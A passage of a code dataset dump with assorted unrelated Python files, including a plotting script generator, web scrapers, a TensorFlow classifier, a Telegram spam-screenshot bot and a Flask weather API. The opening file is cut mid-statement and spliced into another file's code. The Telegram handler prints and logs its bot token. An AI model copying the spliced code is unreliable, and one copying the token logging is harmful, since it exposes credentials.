self.dir+\"/\"+self.plotName+\".sh\"\n\n self.dataFileName_R = self.plotName+\".csv\"\n self.gplotFileName_R = self.plotName+\".plot\"\n self.plotFileName_R = self.plotName+\".eps\"\n self.plotBatchName_R = self.plotName+\".sh\"\n self.plotFilePNG_R = self.plotName+\".png\"\n else:\n self.dataFileName = self.plotName+\".csv\"\n self.gplotFileName = self.plotName+\".plot\"\n self.plotFileName = self.plotName+\".eps\"\n self.plotBatchName = self.plotName+\".sh\"\n\n self.dataFileName_R = self.plotName+\".csv\"\n self.gplotFileName_R = self.plotName+\".plot\"\n self.plotFileName_R = self.plotName+\".eps\"\n self.plotBatchName_R = self.plotName+\".sh\"\n self.plotFilePNG_R = self.plotName+\".png\"\n\n ##\n ## Data File\n ##\n\n wFile = open(self.dataFileName, 'w')\n for row in range (0,self.maxRows):\n fileLine = \"\"\n i = 0\n for dataSet in range(0,self.dataSets):\n if(i>0):\n fileLine = fileLine + \",\"\n col = 2 * dataSet\n fileLine = fileLine + str(self.cellParameters[col][row])\n fileLine = fileLine + \",\"\n fileLine = fileLine + str(self.cellParameters[col+1][row])\n i = i + 1\n wFile.write(str(fileLine)+'\\n')\n wFile.close()\n ##\n ## Plot File\n ##\n\n ## Make plot file\n #self.plot = self.plot + \"set terminal postscript eps monochrome enhanced blacktext size 6.6,3.6\\n\"\n self.plot = self.plot + \"set terminal postscript eps enhanced color size 6.6,3.6\\n\"\n self.plot = self.plot + \"set output \\\"\"+self.plotFileName_R+\"\\\"\\n\"\n self.plot = self.plot + \"#\\n\"\n self.plot = self.plot + \"# Set multiple plot layout\\n\"\n self.plot = self.plot + \"#============================================\\n\"\n self.plot = self.plot + \"set multiplot layout 1,1 rowsfirst\\n\"\n self.plot = self.plot + \"#\\n\"\n self.plot = self.plot + \"# Data file\\n\"\n self.plot = self.plot + \"#============================================\\n\"\n self.plot = self.plot + \"set datafile separator \\\",\\\"\\n\"\n ## One for each plot, if multiple plots\n self.plot = self.plot + \"#============================================\\n\"\n self.plot = self.plot + \"# Plot 1\\n\"\n self.plot = self.plot + \"#============================================\\n\"\n self.plot = self.plot + \"# Title \\n\"\n self.plot = self.plot + \"set title \\\"\"+self.plotTitle+\"\\\"\\n\"\n self.plot = self.plot + \"# Grid settings \\n\"\n self.plot = self.plot + \"#set grid xtics lc rgb \\\"#CCCCCC\\\" lw 0.2 lt 1 \\n\"\n self.plot = self.plot + \"#set grid ytics lc rgb \\\"#CCCCCC\\\" lw 0.2 lt 1 \\n\"\n self.plot = self.plot + \"# Key settings \\n\"\n self.plot = self.plot + \"set key box opaque \\n\"\n self.plot = self.plot + \"set border back \\n\"\n self.plot = self.plot + \"# Axis \\n\"\n if(self.x1Label is not None):\n self.plot = self.plot + \"set xlabel \\\"\"+self.x1Label+\"\\\"\\n\"\n if(self.x2Label is not None):\n self.plot = self.plot + \"set x2label \\\"\"+self.x2Label+\"\\\"\\n\"\n if(self.y1Label is not None):\n self.plot = self.plot + \"set ylabel \\\"\"+self.y1Label+\"\\\"\\n\"\n if(self.y2Label is not None):\n self.plot = self.plot + \"set y2label \\\"\"+self.y2Label+\"\\\"\\n\"\n self.plot = self.plot + \"#set xtics 10\\n\"\n self.plot = self.plot + \"set ytics nomirror tc lt 1\\n\"\n self.plot = self.plot + \"set y2tics nomirror tc lt 1\\n\"\n self.plot = self.plot + \"# Circles \\n\"\n for circles in self.dataCircles:\n if circles is not None:\n self.plot = self.plot + circles+\"\\n\"\n self.plot = self.plot + \"# Plot \\n\"\n self.plot = self.plot + \"plot \\\\\\n\"\n y = 0\n for dataSet in range(0,self.dataSets):\n col = 2 * dataSet\n self.plot = self.plot + \"'\"+self.dataFileName_R+\"' \"\n self.plot = self.plot + \"using \"\n self.plot = self.plot + \"(\"+str(self.dataPointMultiplier[col])+\" * $\"+str(col+1)+\")\"\n self.plot = self.plot + \":\"\n self.plot = self.plot + \"(\"+str(self.dataPointMultiplier[col+1])+\" * $\"+str(col+2)+\") \"\n self.plot = self.plot + \" title '\"+self.dataName[col]+\"' \"\n self.plot = self.plot + \" with \"+str(self.plotType[y])+\" axes \"\n self.plot = self.plot + self.dataAxes[col]\n y = y + 1\n if(dataSet'\n pic = re.compile(pic)\n pic_url = re.findall(pic,nextHtml.text)\n #print(pic_url)\n picture = load_pic(pic_url)\n\n ##保存图片\n with open(\"{}\\{}.jpg\".format(path,url_name),\"wb\") as f:\n f.write(picture)\n print(\"%s.%s图片保存成功\"%(num,url_name))\n num+=1\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n Url_getpic()","sub_path":"demo2/Spider.py","file_name":"Spider.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"487215538","text":"import sys\nimport heapq\nfrom bisect import *\nfrom collections import *\n\ndef solve(n, riders):\n riders = [ r-1 for r in riders ]\n ans = 0\n for index, r in enumerate(riders):\n if r - index > 2:\n return 'Too chaotic'\n\n # count how many bribed rider r\n for j in range(max(r-2, 0), index):\n if riders[j] > r:\n ans += 1\n\n return ans\n\n\ninp = lambda: sys.stdin.readline().rstrip()\nif __name__ == '__main__':\n t = int(inp())\n for tc in range(t):\n n = int(inp())\n riders = list(map(int, inp().split()))\n res = solve(n, riders)\n print(res)\n","sub_path":"hackerrank/new-year-chaos.py","file_name":"new-year-chaos.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"532614693","text":"import tensorflow as tf\nimport numpy as np\n\n\n\"\"\"\nThere is no way to increase model capacity \nI think network makes all the outputs (probability) 0 and\nmake the correctness 50 percent.\n\"\"\"\n\n\n# make weight variable\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\n# make bias variable\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\n# Step 1: data loading and preprocessing\nfamhist = np.genfromtxt('../../data/heart.csv', delimiter=',',\n skip_header=1, dtype=str, usecols=[4])\nfamhist = (famhist == 'Present').astype(np.float32)\n\nheart_data = np.genfromtxt('../../data/heart.csv', delimiter=',',\n skip_header=1, dtype=np.float32,\n usecols=[i for i in range(10) if i != 4])\n# labeling\nheart_label = heart_data[:, -1].reshape([462, 1])\nheart_label = np.concatenate((heart_label, 1 - heart_label), axis=1)\n\n# normalization\nheart_data = heart_data[:, :-1]\nnormalized_heart_data = np.divide(heart_data, np.linalg.norm(heart_data, axis=0))\n\nheart_data = np.concatenate((normalized_heart_data, famhist.reshape([462, 1])),\n axis=1)\n\ntrain_data = heart_data[:400]\ntrain_label = heart_label[:400]\ntest_data = heart_data[400:]\ntest_label = heart_label[400:]\n\n# Step 2: create placeholders for input X (number of fire) and label Y (number of theft)\nX = tf.placeholder(tf.float32, name=\"X\")\nY = tf.placeholder(tf.float32, name=\"Y\")\n\n# Step 3: create weight and bias\nw_1 = weight_variable([9, 100])\nb_1 = bias_variable([100])\n\nkeep_prob = tf.placeholder(tf.float32)\n\nw_2 = weight_variable([100, 100])\nb_2 = bias_variable([100])\n\nw_3 = weight_variable([100, 2])\nb_3 = bias_variable([2])\n\n# Step 4: construct model to predict Y\nhidden_state = tf.nn.relu(tf.matmul(X, w_1) + b_1)\nhidden_state_1 = tf.nn.dropout(hidden_state, keep_prob)\nhidden_state2 = tf.nn.relu(tf.matmul(hidden_state_1, w_2) + b_2)\nhidden_state2_1 = tf.nn.dropout(hidden_state2, keep_prob)\nlogits = tf.matmul(hidden_state2_1, w_3) + b_3\n\nentropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=Y, name='loss')\nloss = tf.reduce_mean(entropy) # compute the mean over examples in the batch\n\n# Step 6: using gradient descent with learning rate of 0.01 to minimize loss\noptimizer = tf.train.AdamOptimizer(learning_rate=0.01).minimize(loss)\ninit = tf.global_variables_initializer()\n\n\nwith tf.Session() as sess:\n # to visualize using TensorBoard\n writer = tf.summary.FileWriter('./logistic_reg', sess.graph)\n\n sess.run(init)\n for i in range(1000):\n total_loss = 0\n _, l = sess.run([optimizer, loss],\n feed_dict={X: train_data, Y: train_label, keep_prob: 0.5})\n total_loss += l\n print('Average loss epoch {0}: {1}'.format(i, total_loss))\n print('Optimization Finished')\n\n # test the model\n\n preds = tf.nn.softmax(logits)\n correct_preds = tf.equal(tf.argmax(preds, 1), tf.argmax(Y, 1))\n accuracy = tf.reduce_sum(tf.cast(correct_preds, tf.float32))\n total_correct_preds = 0\n accuracy_batch = sess.run(accuracy,\n feed_dict={X: test_data, Y: test_label, keep_prob: 1.0})\n total_correct_preds += accuracy_batch\n print('Accuracy {0}'.format(total_correct_preds))\n\n writer.close()\n","sub_path":"assignments/exercises/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"65883738","text":"import logging\nimport subprocess\nfrom multiprocessing import cpu_count\nfrom os.path import abspath, exists\n\nfrom setup_utils import get_include_dir, get_vcvarsall, is_win, is_darwin\n\n\ndef call(cmd, **kwargs):\n cwd = f\"{kwargs['cwd']}> \" if 'cwd' in kwargs else \"\"\n msg = f\"spawning subprocess: {cwd}{cmd}\"\n logging.info(msg)\n subprocess.run(cmd, shell=True, check=True, **kwargs)\n\n\ndef main():\n build_prefix = abspath(\"build_boost\")\n pkg_prefix = abspath(\"pyopcode\")\n toolset = \"gcc\"\n sh_ext = \"sh\"\n sh_prefix = \"./\"\n if is_win:\n call(f\"\\\"{get_vcvarsall()}\\\" amd64\")\n toolset = \"msvc\"\n sh_ext = \"bat\"\n sh_prefix = \"\"\n if is_darwin:\n toolset = \"clang\"\n if not exists(build_prefix):\n call(f\"{sh_prefix}bootstrap.{sh_ext}\", cwd=\"boost_1_67_0\")\n call(f\"{sh_prefix}b2\"\n f\" toolset={toolset}\"\n \" address-model=64\"\n \" link=shared\"\n \" variant=release\"\n \" threading=multi\"\n \" runtime-link=shared\"\n f\" include={get_include_dir()}\"\n \" --with-python\"\n f\" -j{cpu_count()}\"\n \" install\"\n f\" --prefix=\\\"{build_prefix}\\\"\"\n f\" --libdir=\\\"{pkg_prefix}\\\"\",\n cwd=\"boost_1_67_0\")\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n main()\n","sub_path":"build_boost.py","file_name":"build_boost.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"152866792","text":"from telegram import (Bot, Update, InlineKeyboardMarkup, InlineKeyboardButton)\nfrom telegram.ext import (CallbackContext, ConversationHandler)\nimport os, logging\nfrom modules import pytesseractModule, twitterScreenshotRecognizer\nfrom token_extractor import token\nprint(token)\nlogging.info(f\"{token}\")\nbot = Bot(token)\n\n# # Define a few command handlers. These usually take the two arguments update and\n# # context. Error handlers also receive the raised TelegramError object in error.\n\ndef start(update, context):\n user_info = update.message.from_user\n chat_id = update.message.chat.id\n logging.info(\"Test log! user data read successfully.\")\n update.message.reply_text(\n\"\"\"Привет, {}! 👩🏻‍💻 \"\"\".format(user_info.first_name))\n\n context.chat_data.clear()\n user_data = context.user_data\n user_data.clear()\n return -1\n\ndef help_command(update: Update, context: CallbackContext) -> None:\n \"\"\"Send a message when the command /help is issued.\"\"\"\n update.message.reply_text('Help!')\n\ndef test(update, context):\n text = pytesseractModule.read_image()\n update.message.reply_text(f'{text}')\n\ndef image_handler(update: Update, context: CallbackContext):\n file_id = update.message.photo[-1].file_id\n file_ = bot.getFile(file_id)\n path = os.getcwd() + \"/tmp/\" + file_id + \".jpg\"\n #create path if nessesary\n if not os.path.exists(os.getcwd() + \"/tmp/\"):\n os.makedirs(os.getcwd() + \"/tmp/\")\n # now download files\n file_.download(path)\n blacklist = [\"bitcoin\", \"elon\", \"musk\", \"crypto\", \"cryptocurrency\", \"btc\", \"eth\"]\n response = twitterScreenshotRecognizer.inspect(path)\n \n if response == \"tweets\":\n text = pytesseractModule.read_image(path)\n if any([(word in text.lower()) for word in blacklist]):\n update.message.reply_text(f'Спамер обноружен! Это похоже на скриншот твиттера c мошенниками. Хватит спамить! 🙄')\n try:\n bot.delete_message(chat_id=update.message.chat_id,\n message_id=update.message.message_id)\n except:\n update.message.reply_text(\"Can't delete message cause probably i dont have admin rights.\")\n else:\n update.message.reply_text(f'Это похоже на скриншот твиттера. U\\'re on thin freaking ice!')\n else: \n update.message.reply_text(\"Nice pic u got there, be sure not to post twitter screenshoots with Elon Musk on my watch 👀\")","sub_path":"handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"390928553","text":"#!/usr/bin/python\n# -*- encoding: utf-8 -*-\nimport os\n\nimport psutil\nimport pyexcel as pe\nfrom nose import SkipTest\nfrom nose.tools import eq_, raises\n\nfrom pyexcel_odsr import get_data\n\nIN_TRAVIS = \"TRAVIS\" in os.environ\n\n\ndef test_bug_fix_for_issue_1():\n data = get_data(get_fixtures(\"repeated.ods\"), library=\"pyexcel-odsr\")\n eq_(data[\"Sheet1\"], [[\"repeated\", \"repeated\", \"repeated\", \"repeated\"]])\n\n\ndef test_issue_14():\n # pyexcel issue 61\n test_file = \"issue_61.ods\"\n data = get_data(\n get_fixtures(test_file), skip_empty_rows=True, library=\"pyexcel-odsr\"\n )\n eq_(data[\"S-LMC\"], [[u\"aaa\"], [0]])\n\n\ndef test_issue_1():\n test_file = \"12_day_as_time.ods\"\n data = get_data(\n get_fixtures(test_file), skip_empty_rows=True, library=\"pyexcel-odsr\"\n )\n eq_(data[\"Sheet1\"][0][0].days, 12)\n\n\ndef test_issue_2():\n test_file = \"multinode-in-a-p.ods\"\n data = get_data(\n get_fixtures(test_file), skip_empty_rows=True, library=\"pyexcel-odsr\"\n )\n eq_(data[\"product.template\"][1][1], \"PRODUCT NAME PMP\")\n\n\ndef test_issue_83_ods_file_handle():\n # this proves that odfpy\n # does not leave a file handle open at all\n proc = psutil.Process()\n test_file = get_fixtures(\"multinode-in-a-p.ods\")\n open_files_l1 = proc.open_files()\n\n # start with a csv file\n data = pe.iget_array(file_name=test_file, library=\"pyexcel-odsr\")\n open_files_l2 = proc.open_files()\n delta = len(open_files_l2) - len(open_files_l1)\n # cannot catch open file handle\n assert delta == 0\n\n # now the file handle get opened when we run through\n # the generator\n list(data)\n open_files_l3 = proc.open_files()\n delta = len(open_files_l3) - len(open_files_l1)\n # cannot catch open file handle\n assert delta == 0\n\n # free the fish\n pe.free_resources()\n open_files_l4 = proc.open_files()\n # this confirms that no more open file handle\n eq_(open_files_l1, open_files_l4)\n\n\ndef test_issue_23():\n if not IN_TRAVIS:\n raise SkipTest()\n pe.get_book(\n url=\"https://github.com/pyexcel/pyexcel-ods/raw/master/tests/fixtures/white_space.ods\",\n library=\"pyexcel-odsr\",\n )\n # flake8: noqa\n\n\ndef get_fixtures(filename):\n return os.path.join(\"tests\", \"fixtures\", filename)\n","sub_path":"tests/test_bug_fixes.py","file_name":"test_bug_fixes.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"200210294","text":"# Taken from SQLAlchemy with lots of stuff stripped out.\n\n# sqlalchemy/processors.py\n# Copyright (C) 2010-2013 the SQLAlchemy authors and contributors \n# Copyright (C) 2010 Gaetan de Menten gdementen@gmail.com\n#\n# This module is part of SQLAlchemy and is released under\n# the MIT License: http://www.opensource.org/licenses/mit-license.php\n\n\"\"\"defines generic type conversion functions, as used in bind and result\nprocessors.\n\nThey all share one common characteristic: None is passed through unchanged.\n\n\"\"\"\n\nimport datetime\nimport re\n\n\ndef str_to_datetime_processor_factory(regexp, type_):\n rmatch = regexp.match\n # Even on python2.6 datetime.strptime is both slower than this code\n # and it does not support microseconds.\n has_named_groups = bool(regexp.groupindex)\n\n def process(value):\n if value is None:\n return None\n else:\n try:\n m = rmatch(value)\n except TypeError:\n raise ValueError(\"Couldn't parse %s string '%r' \"\n \"- value is not a string.\" %\n (type_.__name__, value))\n if m is None:\n raise ValueError(\"Couldn't parse %s string: \"\n \"'%s'\" % (type_.__name__, value))\n if has_named_groups:\n groups = m.groupdict(0)\n return type_(**dict(zip(groups.iterkeys(),\n map(int, groups.itervalues()))))\n else:\n return type_(*map(int, m.groups(0)))\n return process\n\n\nDATETIME_RE = re.compile(\"(\\d+)-(\\d+)-(\\d+) (\\d+):(\\d+):(\\d+)(?:\\.(\\d+))?\")\n\nstr_to_datetime = str_to_datetime_processor_factory(DATETIME_RE,\n datetime.datetime)\n","sub_path":"pyhive/sqlalchemy_processors.py","file_name":"sqlalchemy_processors.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"337059293","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom ..items import BeibeispiderItem\n\n\nclass BeibeiSpider(scrapy.Spider):\n\tname = 'beibei'\n\tallowed_domains = ['beibei.com']\n\tstart_urls = ['https://www.beibei.com/']\n\n\tdef parse(self, response):\n\t\t\"\"\"\n\t\t获得所有种类\n\t\t:param response:\n\t\t:return:\n\t\t\"\"\"\n\t\tall_link_list = response.xpath(\"//div[@class='sub-nav-cont']/div/div/ul/li/a/@href\").getall()\n\t\tall_link_list = all_link_list[1:10]\n\t\tfor link in all_link_list:\n\t\t\tnew_link = 'https:' + link\n\t\t\tyield scrapy.Request(url = new_link, callback = self.parse_all_page, meta = {'cate_link': new_link})\n\n\tdef parse_all_page(self, response):\n\t\t\"\"\"\n\t\t获得所有页\n\t\t:param response:\n\t\t:return:\n\t\t\"\"\"\n\t\tcate_link = response.meta['cate_link']\n\t\tmax_page_num = response.xpath(\"//div[@class='pagination']/a[last()-1]/text()\").get()\n\t\tif max_page_num:\n\t\t\tfor i in range(1, int(max_page_num) + 1):\n\t\t\t\tyield scrapy.Request(url = str(cate_link).replace('-1', '-' + str(i)), callback = self.parse_info)\n\t\telse:\n\t\t\tyield scrapy.Request(url = cate_link, callback = self.parse_info)\n\n\tdef parse_info(self, response):\n\t\t\"\"\"\n\t\t获取 每个类别,每一页,每个商品的标题,现价,原价,折扣,详细链接,图片链接,\n\t\t:param response:\n\t\t:return:\n\t\t\"\"\"\n\t\tall_info_list = response.xpath(\"//div[@class='m-item-detail']\")\n\t\tfor info in all_info_list:\n\t\t\titem = BeibeispiderItem()\n\n\t\t\titem['goods_title'] = info.xpath(\"./a/p/text()\").get()\n\t\t\titem['now_price'] = info.xpath(\"./a/div/p[1]/span[2]/text()\").get()\n\t\t\titem['origin_price'] = info.xpath(\"./a/div/p[2]/text()\").get()\n\t\t\titem['discount'] = info.xpath(\"./a/div/p[3]/text()\").get()\n\t\t\titem['next_link'] = info.xpath(\"./a/@href\").get()\n\t\t\titem['img_link'] = info.xpath(\"./a/img/@src\").get()\n\n\t\t\tyield item\n","sub_path":"BeibeiSpider/BeibeiSpider/spiders/beibei.py","file_name":"beibei.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"48300833","text":"from sys import stdin, setrecursionlimit\nfrom collections import deque\nfrom bisect import bisect_left\n\n\ndef main():\n input = stdin.buffer.readline\n n = int(input())\n a = [int(input()) for _ in range(n)]\n ans = deque()\n for ai in a:\n idx = bisect_left(ans, ai)\n if idx == 0:\n ans.appendleft(ai)\n else:\n ans[idx - 1] = ai\n\n print(len(ans))\n\n\nif __name__ == \"__main__\":\n setrecursionlimit(10000)\n main()\n","sub_path":"Python_codes/p02973/s460915841.py","file_name":"s460915841.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"187847908","text":"f = open(\"g1/ex20/file.txt\",\"r\")\n\nnline = 0\nnWord = 0\nnChar = 0\n\nfor line in f:\n if line ==\"\":\n break\n \n nline += 1\n\n s = line.split()\n\n for word in s:\n nWord += 1\n nChar += len(word)\n\nprint(\"O ficheiro tem %d linhas, %d palavras e %d caracteres\"%(nline,nWord,nChar))","sub_path":"g1/ex20/prog.py","file_name":"prog.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"284323605","text":"# coding=utf-8\nimport os\n\nfrom duckietown_challenges import read_yaml_file\n\n\nclass ChallengeInfoLocal:\n def __init__(self, challenge_name):\n self.challenge_name = challenge_name\n\n\ndef read_challenge_info(dirname):\n bn = 'challenge.yaml'\n fn = os.path.join(dirname, bn)\n\n data = read_yaml_file(fn)\n try:\n challenge_name = data['challenge']\n\n return ChallengeInfoLocal(challenge_name)\n except BaseException as e:\n msg = 'Could not read file %r: %s' % (fn, e)\n raise Exception(msg)\n","sub_path":"src/duckietown_challenges_runner/local_config.py","file_name":"local_config.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"308937078","text":"'''\nAuthor: Puffrora\nDate: 2021-03-01 20:24:03\nLastModifiedBy: Puffrora\nLastEditTime: 2021-03-01 20:35:07\n'''\n\n\nfrom typing import List\n\n\nclass Solution:\n def updateMatrix(self, matrix: List[List[int]]) -> List[List[int]]:\n\n visited = set()\n row, col = len(matrix), len(matrix[0])\n\n def get_neighbor(i, j):\n for dx, dy in [(0, 1), (0, -1), (-1, 0), (1, 0)]:\n if 0 <= i+dx < row and 0 <= j+dy < col:\n yield i+dx, j+dy\n \n queue = []\n for i in range(row):\n for j in range(col):\n if matrix[i][j] == 0:\n visited.add((i, j))\n queue.append((i, j))\n \n cur_depth = 0\n while queue:\n cur_depth += 1\n for _ in range(len(queue)):\n cur_i, cur_j = queue.pop(0)\n for ni, nj in get_neighbor(cur_i, cur_j):\n if (ni, nj) not in visited:\n matrix[ni][nj] = cur_depth\n visited.add((ni, nj))\n queue.append((ni, nj))\n \n return matrix\n\n\n","sub_path":"Leetcode/leetcode542 01 矩阵.py","file_name":"leetcode542 01 矩阵.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"204603606","text":"from socket import *\n\nHOST = '127.0.0.1' \nPORT = 21575 #可用端口\nBUFSIZ = 1024\nADDR = (HOST,PORT)\n\ntcpCliSock = socket(AF_INET,SOCK_STREAM)\ntcpCliSock.connect(ADDR)\n\nwhile True:\n\tdata = input()\n\tif not data:\n\t\tbreak\n\ttcpCliSock.send(data.encode(encoding = \"utf-8\")) #法送数据为bytes型str->bytes \n\tdata = tcpCliSock.recv(BUFSIZ)\n\tif not data:\n\t\tbreak\n\tprint (data.decode()) #bytes->str\n\ntcpCliSock.close()","sub_path":"tsTclnt.py","file_name":"tsTclnt.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"555443397","text":"from flask import Flask, request\nfrom flask_restful import Resource, Api\nfrom sqlalchemy import create_engine\nfrom json import dumps\nfrom flask_jsonpify import jsonify\nfrom flask import render_template\nfrom flask import abort\nimport json\nimport pandas as pd\nfrom datetime import datetime, timedelta\nfrom dateutil.parser import parse\n\ndb_connect = create_engine('sqlite:///daily.db')\napp = Flask(__name__)\napi = Api(app)\n\n@app.route('/')\ndef homepage():\n return render_template('index.html')\n\n@app.route('/historical/', methods=['GET', 'POST'])\ndef historical():\n if request.method == 'GET':\n dates_list = []\n conn = db_connect.connect()\n query = conn.execute(\"select DATE from daily\")\n my_hist = [i[0] for i in query.cursor.fetchall()]\n for item in my_hist:\n obj = {\"DATE\":item}\n dates_list.append(obj)\n return jsonify(dates_list)\n else:\n obj = {}\n conn = db_connect.connect()\n query = conn.execute(\"insert into daily(DATE,TMAX,TMIN) values (?,?,?)\",(request.json[\"DATE\"],request.json[\"TMAX\"],request.json[\"TMIN\"]))\n obj = {\n \"DATE\" : request.json[\"DATE\"]\n }\n return jsonify(obj), 201\n\n\n@app.route('/historical/', methods=['GET','DELETE'])\ndef get_weather(DATE):\n if request.method == 'DELETE':\n conn = db_connect.connect()\n query = conn.execute(\"select DATE from daily where DATE=%d\" % int(DATE))\n result = [dict(zip(tuple(query.keys()), i)) for i in query.cursor]\n if(len(result)>0):\n query = conn.execute(\"delete from daily where DATE=%d\" % int(DATE))\n return \" \", 204\n else:\n abort(404)\n else:\n obj = {}\n conn = db_connect.connect()\n query = conn.execute(\"select DATE,TMAX,TMIN from daily where DATE =%d\" % int(DATE))\n result = [dict(zip(tuple(query.keys()), i)) for i in query.cursor]\n if(len(result)>0):\n for item in result:\n obj = {\n \"DATE\": item['date'],\n \"TMAX\": item['tmax'],\n \"TMIN\": item['tmin']\n }\n return jsonify(obj)\n else:\n abort(404)\n\n\n@app.route('/forecast/')\ndef forecast_weather(DATE):\n lst_dates = []\n lst_obj = []\n current_date = pd.to_datetime(DATE,format='%Y%m%d')\n stop_date = current_date+timedelta(days=7)\n while current_date 0):\n for item in result:\n obj = {\n \"DATE\": curr_date,\n \"TMAX\": item['tmax'],\n \"TMIN\": item['tmin']\n }\n lst_obj.append(obj)\n else:\n curr_1 = \"2013\"+curr_date[4:]\n query = conn.execute(\"select DATE,TMAX,TMIN from daily where DATE =%d\" % int(curr_1))\n result = [dict(zip(tuple(query.keys()), i)) for i in query.cursor]\n for item in result:\n obj = {\n \"DATE\": curr_date,\n \"TMAX\": item['tmax'],\n \"TMIN\": item['tmin']\n }\n lst_obj.append(obj)\n print(lst_obj)\n return jsonify(lst_obj)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0' , port=5000 , debug=\"True\")\n\n","sub_path":"flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"414891795","text":"#! /usr/bin/env python3\n\nfrom __future__ import print_function\nimport sys\nimport os\nimport subprocess\n\n\ndef main(args):\n\tfile = open(args[1])\n\tlines = [l for l in file.readlines()]\n\tdef mapper(strr):\n\t\ttry: \n\t\t\treturn hex(int(strr, 2))[2:]\n\t\texcept Exception: \n\t\t\treturn 'x'\n\tresults = []\n\tfor l in lines:\n\t\thexes = list(map(mapper,l.split()))\n\t\tra = ''.join(hexes[:8])\n\t\tsp = ''.join(hexes[8:16])\n\t\tt0 = ''.join(hexes[16:24])\n\t\tt1 = ''.join(hexes[24:32])\n\t\tt2 = ''.join(hexes[32:40])\n\t\ts0 = ''.join(hexes[40:48])\n\t\ts1 = ''.join(hexes[48:56])\n\t\ta0 = ''.join(hexes[56:64])\n\t\tfetchAddr = ''.join(hexes[64:72])\n\t\tinst = ''.join(hexes[72:80])\n\t\ttime_step = ''.join(hexes[80:84])\n\t\tresult = [\"ra: \", ra, \"sp: \", sp, \"t0: \", t0, \"t1: \", t1, \"t2: \", t2, \"s0: \", s0, \"s1: \", s1, \"a0: \", a0, \n\t\t\t\t\"PC: \", fetchAddr, \"inst: \", inst, \"Time_Step: \", time_step]\n\t\tresults.append(result) \n\tfor i in range(len(results)):\n\t\tstring2 = ' '.join(results[i])\n\t\tprint(string2)\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)\n","sub_path":"proj3/binary_to_hex.py","file_name":"binary_to_hex.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"182489914","text":"from flask import redirect, url_for\n\nfrom lib.controllers import BaseController, render, admin_required\nfrom app.models import *\nfrom app.forms.forum import ForumForm\n\n\nclass ForumsController(BaseController):\n @render\n def index(self):\n self.forums = Forum.query.all()\n\n @render\n def show(self):\n self.forum = Forum.query.get_or_404(self.params['forum_id'])\n\n @admin_required\n @render\n def new(self):\n self.form = getattr(self, 'form', None) or ForumForm()\n\n @admin_required\n @render\n def edit(self):\n self.forum = Forum.query.get_or_404(self.params['forum_id'])\n self.form = getattr(self, 'form', None) or ForumForm(obj=self.forum)\n\n @admin_required\n def create(self):\n self.form = ForumForm()\n if self.form.validate_on_submit():\n del self.form\n forum = Forum.create(user_id=self.current_user.id, **self._forum_params())\n return redirect(url_for('forums.show', forum_id=forum.id))\n else:\n return self.new()\n\n @admin_required\n def update(self):\n self.form = ForumForm()\n if self.form.validate_on_submit():\n del self.form\n forum = Forum.query.get_or_404(self.params['forum_id'])\n forum.update(**self._forum_params())\n return redirect(url_for('forums.show', forum_id=forum.id))\n else:\n return self.edit()\n\n @admin_required\n def destroy(self):\n forum = Forum.query.get_or_404(self.params['forum_id'])\n forum.delete()\n return redirect(url_for('forums.index'))\n\n def _forum_params(self):\n return self.permit(self.params, 'position', 'title')\n","sub_path":"app/controllers/forums.py","file_name":"forums.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"148592141","text":"# -*- coding: utf-8 -*-\n# импортируем модули\nimport telebot\nimport conf\nimport random\nimport shelve\nfrom telebot import types\nimport urllib.parse\nbot = telebot.TeleBot(conf.TOKEN, threaded=False)\nshelve_name = './shelve.db'\n\n#exact form\norder_of_arguments_exact = 